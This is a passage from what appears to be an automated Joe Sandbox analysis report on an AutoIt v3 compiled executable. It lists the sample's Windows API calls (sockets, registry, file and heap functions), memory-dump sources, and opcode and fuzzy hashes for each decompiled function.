                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: 45ffad91ae3fb32d18df48fd9ebd71b1faf3a4b691e4f0e92b404c0f9c36f1a2
                          • Instruction ID: 211dd8befe7fa895a86444c547e2f8cd67f46922ff9768abffd55b8f763667fb
                          • Opcode Fuzzy Hash: 45ffad91ae3fb32d18df48fd9ebd71b1faf3a4b691e4f0e92b404c0f9c36f1a2
                          • Instruction Fuzzy Hash: 36F0D0715402D47AD731976B6C48E672E7EEBCBF20B01451FBA04A31B1D96508A5DA70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00B59409
                          • WSAGetLastError.WS2_32(00000000), ref: 00B59416
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00B5943A
                          • _strlen.LIBCMT ref: 00B59484
                          • _memmove.LIBCMT ref: 00B594CA
                          • WSAGetLastError.WS2_32(00000000), ref: 00B594F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLast$_memmove_strlenselect
                          • String ID:
                          • API String ID: 2795762555-0
                          • Opcode ID: 83394ec409bac289a043f22d42b5779315dac7a408cbbd001050a49cce4cff60
                          • Instruction ID: 6016223ce67625af909b489a9b899591cfbe317c3e6c086dc8ec1bc2a55c3a9e
                          • Opcode Fuzzy Hash: 83394ec409bac289a043f22d42b5779315dac7a408cbbd001050a49cce4cff60
                          • Instruction Fuzzy Hash: 07416075500204EFDB14EB64C985BAEBBF9EF48311F1042E9F916972D2DB30AE05CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B03B1E: _wcsncpy.LIBCMT ref: 00B03B32
                          • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00B46DBA
                          • GetLastError.KERNEL32 ref: 00B46DC5
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B46DD9
                          • _wcsrchr.LIBCMT ref: 00B46DFB
                            • Part of subcall function 00B46D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00B46E31
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                          • String ID:
                          • API String ID: 3633006590-0
                          • Opcode ID: 037ab10a014f134ed750eeb00b7ace9da72780cf1142d758b0dc46fbeb4c2b14
                          • Instruction ID: 6c63f713ea6ba6776dc54bec9299fd0b5baeebb2071febe8a8d9f73f6e18a254
                          • Opcode Fuzzy Hash: 037ab10a014f134ed750eeb00b7ace9da72780cf1142d758b0dc46fbeb4c2b14
                          • Instruction Fuzzy Hash: 5821A875A4132496DB207B74EC4AAEA33DCCF12710F2005E6E525D70E2EF20CF84AB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B5ACD3: inet_addr.WS2_32(00000000), ref: 00B5ACF5
                          • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00B59160
                          • WSAGetLastError.WS2_32(00000000), ref: 00B5916F
                          • connect.WS2_32(00000000,?,00000010), ref: 00B5918B
                          Similarity
                          • API ID: ErrorLastconnectinet_addrsocket
                          • String ID:
                          • API String ID: 3701255441-0
                          • Opcode ID: af6c98572ff64d725fdffe8048c688fb4ea2d9d79fff58c468198f9bed2c6c08
                          • Instruction ID: 7b2c9d8ce1ad0d9b07a9ed896ca1a7a422a5898e25175c7e1b5086d185eb07ec
                          • Opcode Fuzzy Hash: af6c98572ff64d725fdffe8048c688fb4ea2d9d79fff58c468198f9bed2c6c08
                          • Instruction Fuzzy Hash: 95219035200611AFDB00AF68CC89B6E77E9EF48724F048599F916AB3E2CB70EC05CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B03F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B034E2,?,00000001), ref: 00B03FCD
                          • _free.LIBCMT ref: 00B73C27
                          • _free.LIBCMT ref: 00B73C6E
                            • Part of subcall function 00B0BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00BC22E8,?,00000000,?,00B03E2E,?,00000000,?,00B9DBF0,00000000,?), ref: 00B0BE8B
                            • Part of subcall function 00B0BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00B03E2E,?,00000000,?,00B9DBF0,00000000,?,00000002), ref: 00B0BEA7
                            • Part of subcall function 00B0BDF0: __wsplitpath.LIBCMT ref: 00B0BF19
                            • Part of subcall function 00B0BDF0: _wcscpy.LIBCMT ref: 00B0BF31
                            • Part of subcall function 00B0BDF0: _wcscat.LIBCMT ref: 00B0BF46
                            • Part of subcall function 00B0BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00B0BF56
                          Strings
                          Similarity
                          • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                          • API String ID: 1510338132-1757145024
                          • Opcode ID: bfb8de045e738e9724f6b7f322904b37c0b5cff55f4a97d5853fbde889f9e8d7
                          • Instruction ID: 1a8faf7ffd2c8e7859719487d4278adfbe649a78e45f08baa4d3fe6a629a4dd3
                          • Opcode Fuzzy Hash: bfb8de045e738e9724f6b7f322904b37c0b5cff55f4a97d5853fbde889f9e8d7
                          • Instruction Fuzzy Hash: E0915171910219AFCF04EFA4CC929EEB7F4FF04710F1445A9F416AB291DB749A45DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __getstream.LIBCMT ref: 00B2418E
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B241C9
                          • __wopenfile.LIBCMT ref: 00B241D9
                          Strings
                          Similarity
                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                          • String ID: <G
                          • API String ID: 1820251861-2138716496
                          • Opcode ID: 17c889dea0deebdf89615af757b19993463ee790490a3299d26dfacbdc19cf45
                          • Instruction ID: 33fb24ee9a65e31faaca78acba6fee8203fd4d4c9784cfd0e0b470ec4cf9c9c5
                          • Opcode Fuzzy Hash: 17c889dea0deebdf89615af757b19993463ee790490a3299d26dfacbdc19cf45
                          • Instruction Fuzzy Hash: 1911C471900236DADB10AFB4AC426AF3AE4AF55350B1485E5E41CEB281EB74C95197A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B1C948,SwapMouseButtons,00000004,?), ref: 00B1C979
                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00B1C948,SwapMouseButtons,00000004,?,?,?,?,00B1BF22), ref: 00B1C99A
                          • RegCloseKey.KERNEL32(00000000,?,?,00B1C948,SwapMouseButtons,00000004,?,?,?,?,00B1BF22), ref: 00B1C9BC
                          Strings
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          • Opcode ID: 77ac05c4c85208726fc2a2c6247410bcd8ec494cab5c1599f8d39bdf15ba454c
                          • Instruction ID: ebab20a498bbb1dea5f333dc76c0687d441a23d462a595ea0244e7bcc1131248
                          • Opcode Fuzzy Hash: 77ac05c4c85208726fc2a2c6247410bcd8ec494cab5c1599f8d39bdf15ba454c
                          • Instruction Fuzzy Hash: 3F117C75551208BFDB128F64DC84EEE7BF8EF04790F50449AA841E7210D6319E80DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f827085673d2bb7363ae7acd4521adc9867673d550935d82f05253e7d4da1cd
                          • Instruction ID: 96b5e976649d25d955becd0c7500eab0c0a682c6abd973410a3d7310cdfc7fb5
                          • Opcode Fuzzy Hash: 6f827085673d2bb7363ae7acd4521adc9867673d550935d82f05253e7d4da1cd
                          • Instruction Fuzzy Hash: 2EC12A75A00216EBCB14CF94C994EAEB7B5FF48714F3085D9E941AB291E730EE41CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B041A7: _fseek.LIBCMT ref: 00B041BF
                            • Part of subcall function 00B4CE59: _wcscmp.LIBCMT ref: 00B4CF49
                            • Part of subcall function 00B4CE59: _wcscmp.LIBCMT ref: 00B4CF5C
                          • _free.LIBCMT ref: 00B4CDC9
                          • _free.LIBCMT ref: 00B4CDD0
                          • _free.LIBCMT ref: 00B4CE3B
                            • Part of subcall function 00B228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B28715,00000000,00B288A3,00B24673,?), ref: 00B228DE
                            • Part of subcall function 00B228CA: GetLastError.KERNEL32(00000000,?,00B28715,00000000,00B288A3,00B24673,?), ref: 00B228F0
                          • _free.LIBCMT ref: 00B4CE43
                          Similarity
                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                          • String ID:
                          • API String ID: 1552873950-0
                          • Opcode ID: 4c2a67bf80afeb39d6635efd2a9e9b252b70a840de711fe023f2a9c04e7b89ce
                          • Instruction ID: ba4d0ec8610e00eaf6059e13e28d16128ad8a42d2867536004cb3db62c55dcfe
                          • Opcode Fuzzy Hash: 4c2a67bf80afeb39d6635efd2a9e9b252b70a840de711fe023f2a9c04e7b89ce
                          • Instruction Fuzzy Hash: B5513CB1D04218AFDB159F64DC81AAEBBB9FF48300F1040EEB65DA7291D7715A808F59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B01E87
                            • Part of subcall function 00B038E4: _memset.LIBCMT ref: 00B03965
                            • Part of subcall function 00B038E4: _wcscpy.LIBCMT ref: 00B039B5
                            • Part of subcall function 00B038E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B039C6
                          • KillTimer.USER32(?,00000001), ref: 00B01EDC
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B01EEB
                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B74526
                          Similarity
                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                          • String ID:
                          • API String ID: 1378193009-0
                          • Opcode ID: a6ef8bf7c656cd039f25c78f1a8ba780c4d940c23a8bbae1c8b7074e407dfb62
                          • Instruction ID: af6ddfb91a0cf340a2cf409cccf84b254ecac82b87a5380608276d3eff569f29
                          • Opcode Fuzzy Hash: a6ef8bf7c656cd039f25c78f1a8ba780c4d940c23a8bbae1c8b7074e407dfb62
                          • Instruction Fuzzy Hash: EC21B0B1904394ABE7328B28C855BEABFECDB16308F0444CEE69E57281C7745A85CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F282
                            • Part of subcall function 00B1F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F2A6
                          • gethostbyname.WS2_32(?), ref: 00B592F0
                          • WSAGetLastError.WS2_32(00000000), ref: 00B592FB
                          • _memmove.LIBCMT ref: 00B59328
                          • inet_ntoa.WS2_32(?), ref: 00B59333
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                          • String ID:
                          • API String ID: 1504782959-0
                          • Opcode ID: b852c9b43ec14a5369c43aa57bb19205917f30f67daae9233f139c03c37c066a
                          • Instruction ID: 2b7ba6815f841543af17a75495938583f5b77a32197d2210b7dcca13e95ed89f
                          • Opcode Fuzzy Hash: b852c9b43ec14a5369c43aa57bb19205917f30f67daae9233f139c03c37c066a
                          • Instruction Fuzzy Hash: 0311FE75900109AFCB14FBA4DD56DEE7BF9EF1431171440A5F506A72A1DF30AE04DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B245EC: __FF_MSGBANNER.LIBCMT ref: 00B24603
                            • Part of subcall function 00B245EC: __NMSG_WRITE.LIBCMT ref: 00B2460A
                            • Part of subcall function 00B245EC: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001), ref: 00B2462F
                          • std::exception::exception.LIBCMT ref: 00B2013E
                          • __CxxThrowException@8.LIBCMT ref: 00B20153
                            • Part of subcall function 00B27495: RaiseException.KERNEL32(?,?,00B0125D,00BB6598,?,?,?,00B20158,00B0125D,00BB6598,?,00000001), ref: 00B274E6
                          Strings
                          Similarity
                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                          • String ID: bad allocation
                          • API String ID: 3902256705-2104205924
                          • Opcode ID: f515863a0c38667b3e11438b186da2868f5934ac9e5f33cd85c2559ad97cd227
                          • Instruction ID: 514e0e082e1396cfb25a409decf9ac811c23c002b38dcd7b5182d4329997b2b3
                          • Opcode Fuzzy Hash: f515863a0c38667b3e11438b186da2868f5934ac9e5f33cd85c2559ad97cd227
                          • Instruction Fuzzy Hash: E2F0A43510423DB6C715BBA8F802ADEB7E8AF04351F1004D6FA1CA61D2DBB086A1D7A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 63b283bfddbffb35663850ce48597da9fa0b9f33b9f386b48e171885398a29a5
                          • Instruction ID: 7ca07de6dab717373068d8f229ef82cd057eb774b3741a55c4cb503dc2bbedc3
                          • Opcode Fuzzy Hash: 63b283bfddbffb35663850ce48597da9fa0b9f33b9f386b48e171885398a29a5
                          • Instruction Fuzzy Hash: 93F16A71A047019FC710DF24C484B6AFBE5FF88314F1489ADF9999B291D770E949CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00B0C00E,?,?,?,?,00000010), ref: 00B0C627
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00B0C65F
                          • _memmove.LIBCMT ref: 00B0C697
                          Similarity
                          • API ID: ByteCharMultiWide$_memmove
                          • String ID:
                          • API String ID: 3033907384-0
                          • Opcode ID: de42b71c8bb00c200ef26c62910627377f29fde1a50c39510a4a1a781cffbf36
                          • Instruction ID: 6e0573f31b4821bd8432a750435f4102097547a6709367764280de63e9fa0567
                          • Opcode Fuzzy Hash: de42b71c8bb00c200ef26c62910627377f29fde1a50c39510a4a1a781cffbf36
                          • Instruction Fuzzy Hash: 1A31E9B26012016BD724AB74D846B2BBFD9EF44350F10467AF95ECB2E1EB32E950C751
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SHGetMalloc.SHELL32(00B03C31), ref: 00B03A7D
                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00B03AD2
                          • SHGetDesktopFolder.SHELL32(?), ref: 00B03A8F
                            • Part of subcall function 00B03B1E: _wcsncpy.LIBCMT ref: 00B03B32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DesktopFolderFromListMallocPath_wcsncpy
                          • String ID:
                          • API String ID: 3981382179-0
                          • Opcode ID: 53b29ee3886d94773047a931983a22eecdb028e1d0ebebae3f5001fa99981b4f
                          • Instruction ID: 5545c7a2ebc5eb5c9ca278fac47caff067f338a84a4a14f6798a482978bbde84
                          • Opcode Fuzzy Hash: 53b29ee3886d94773047a931983a22eecdb028e1d0ebebae3f5001fa99981b4f
                          • Instruction Fuzzy Hash: CF213D76B00114ABCB14DB95D888EAEBBFDEF88704B144095F509D72A1DB309E46CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __FF_MSGBANNER.LIBCMT ref: 00B24603
                            • Part of subcall function 00B28E52: __NMSG_WRITE.LIBCMT ref: 00B28E79
                            • Part of subcall function 00B28E52: __NMSG_WRITE.LIBCMT ref: 00B28E83
                          • __NMSG_WRITE.LIBCMT ref: 00B2460A
                            • Part of subcall function 00B28EB2: GetModuleFileNameW.KERNEL32(00000000,00BC0312,00000104,?,00000001,00B20127), ref: 00B28F44
                            • Part of subcall function 00B28EB2: ___crtMessageBoxW.LIBCMT ref: 00B28FF2
                            • Part of subcall function 00B21D65: ___crtCorExitProcess.LIBCMT ref: 00B21D6B
                            • Part of subcall function 00B21D65: ExitProcess.KERNEL32 ref: 00B21D74
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          • RtlAllocateHeap.NTDLL(014A0000,00000000,00000001), ref: 00B2462F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                          • String ID:
                          • API String ID: 1372826849-0
                          • Opcode ID: 3283848fcce1122df45398464b77a1ccc6d0f5915afafbc99d8397745052aa9c
                          • Instruction ID: a8a30179e3ab90ceefe4b57d739b803c93e7959349b0e61f6211142b4b1c5f6e
                          • Opcode Fuzzy Hash: 3283848fcce1122df45398464b77a1ccc6d0f5915afafbc99d8397745052aa9c
                          • Instruction Fuzzy Hash: 4301B931611231AAE6227B38BC41B2A33C8EF87761F1105E5F50DDB5D5DFB49C408664
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TranslateMessage.USER32(?), ref: 00B0E646
                          • DispatchMessageW.USER32(?), ref: 00B0E651
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B0E664
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Message$DispatchPeekTranslate
                          • String ID:
                          • API String ID: 4217535847-0
                          • Opcode ID: 3e8541aa77cbf2944234e51ee4c3e236736179969a890dc02f8479afca7a9312
                          • Instruction ID: ee38b9cea4a973c0bd0adacb38d7e66f50a9094eb71820f4ab516de6193fc49a
                          • Opcode Fuzzy Hash: 3e8541aa77cbf2944234e51ee4c3e236736179969a890dc02f8479afca7a9312
                          • Instruction Fuzzy Hash: D6F058722083499BDB20EAE49C45FABB7DCAB84740F580CBEB651C20D0EAA1E4008722
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _free.LIBCMT ref: 00B4C45E
                            • Part of subcall function 00B228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B28715,00000000,00B288A3,00B24673,?), ref: 00B228DE
                            • Part of subcall function 00B228CA: GetLastError.KERNEL32(00000000,?,00B28715,00000000,00B288A3,00B24673,?), ref: 00B228F0
                          • _free.LIBCMT ref: 00B4C46F
                          • _free.LIBCMT ref: 00B4C481
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                          • Instruction ID: eb0f8716bb1f8b6af06c090f800160786d40ba3aca1d1db12ed8de079c489699
                          • Opcode Fuzzy Hash: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                          • Instruction Fuzzy Hash: F8E012A1602711A6CA68AA797954BB357CCAF04B51B1449ADF44DDB382DF2CE9409138
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID: CALL
                          • API String ID: 0-4196123274
                          • Opcode ID: 06ec5e319c10d071aa74bc21a6acc71ffccfe5c3f0617db02a3a1adfe1b1e859
                          • Instruction ID: ba1d7f6254080117631d18d4b030bd299b2858823625c15a134105606b52999f
                          • Opcode Fuzzy Hash: 06ec5e319c10d071aa74bc21a6acc71ffccfe5c3f0617db02a3a1adfe1b1e859
                          • Instruction Fuzzy Hash: F5226C70618241DFD728EF14C490A6ABBE1FF84300F5589ADE99A8B2A1D771E885CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B016F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00B01751
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B0159B
                          • CoInitialize.OLE32(00000000), ref: 00B01612
                          • CloseHandle.KERNEL32(00000000), ref: 00B758F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Handle$ClipboardCloseFormatInitializeRegister
                          • String ID:
                          • API String ID: 458326420-0
                          • Opcode ID: ffe1a3b1de71860dc1b3f1f76db010a7c77d935f2fc26cd8cd2e409868b2b804
                          • Instruction ID: 0396d8a9ad871e70ddee55b63b54a9e6684b97080262b444e4215447a4c2059b
                          • Opcode Fuzzy Hash: ffe1a3b1de71860dc1b3f1f76db010a7c77d935f2fc26cd8cd2e409868b2b804
                          • Instruction Fuzzy Hash: D87189B59012418BC318EF6EA8A0D94BBE4FB9E3453944DAED00AB73A3CF708854CF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: EA06
                          • API String ID: 4104443479-3962188686
                          • Opcode ID: cf12ba43cbc7aa81a4888bfdc4606b2c9dd6c95e231187def038cf6e32628ea4
                          • Instruction ID: 77ceb5108288510f6d17b8151ed90f1a8183d8e98fff1b87b8ede75dfa7acb83
                          • Opcode Fuzzy Hash: cf12ba43cbc7aa81a4888bfdc4606b2c9dd6c95e231187def038cf6e32628ea4
                          • Instruction Fuzzy Hash: 55417BF1A041589BDB219B6488927BF7FE2DF15300F1844E5EB82FB1C3D7618D8483A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
